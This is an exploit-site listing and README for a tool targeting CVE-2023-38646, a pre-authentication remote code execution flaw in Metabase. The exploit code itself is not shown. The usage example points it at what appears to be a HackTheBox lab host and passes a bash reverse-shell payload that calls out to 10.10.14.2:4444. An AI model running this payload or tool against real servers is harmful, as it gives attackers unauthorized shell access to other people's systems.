Exploit for CVE-2023-38646

Name: Exploit for CVE-2023-38646
Rating: 5 (209 reviews)

2024-05-27 | CVSS 9.8

## https://sploitus.com/exploit?id=2AB74EF3-6E81-562D-A857-2E679C5085B3
# CVE-2023-38646

An exploit for CVE-2023-38646, a pre-auth RCE in Metabase open-source edition < 0.46.6.1 and Metabase enterprise edition < 1.46.6.1.

# Usage

You can use the exploit as follows:
```bash
python3 ./cve_2023-38646.py -t http://data.analytical.htb -c '/bin/bash -i >& /dev/tcp/10.10.14.2/4444 0>&1'
```

# Disclaimer

This is a tool for assessing your companies exposure to CVE-2023-38646, I am not response for any illegal or irresponsible usage of this code. 
For educational purposes only!